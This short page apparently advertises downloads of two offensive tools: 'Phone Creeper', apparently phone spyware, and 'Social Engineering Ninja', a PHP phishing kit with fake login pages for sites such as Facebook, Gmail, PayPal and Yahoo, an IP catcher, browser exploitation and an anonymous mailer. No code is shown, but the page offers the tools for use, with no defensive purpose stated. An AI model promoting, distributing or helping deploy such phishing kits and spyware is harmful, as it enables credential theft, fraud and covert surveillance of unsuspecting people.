Download Phone Creeper v0.98 (PhoneCreeper_V0.98.cab) and its uninstaller (RemoveCreeper.zip) here.

Social Engineering Ninja – PHP scripts

S-E Ninja is a social engineering tool, with fake pages for 20-25 popular sites and an anonymous mailer that uses the mail() function in PHP.


Sites included:
amazon.com
digg.com
ebuddy.com
facebook.com
gmail.com
hotmail.com
msn.com (hotmail)
myspace.com
onecard.com (AR,EN Langs)
paypal.com
travian.com (AR,EN Langs)
twitter.com
yahoo.com
youtube.com
xboxlive.com
hotfile.com

Features:
popular phishing pages
IP catcher with redirection
Public browser exploitation
Anonymous email sender

Download Social-Engineering Ninja V0.4 (SEN-V0.4.rar) here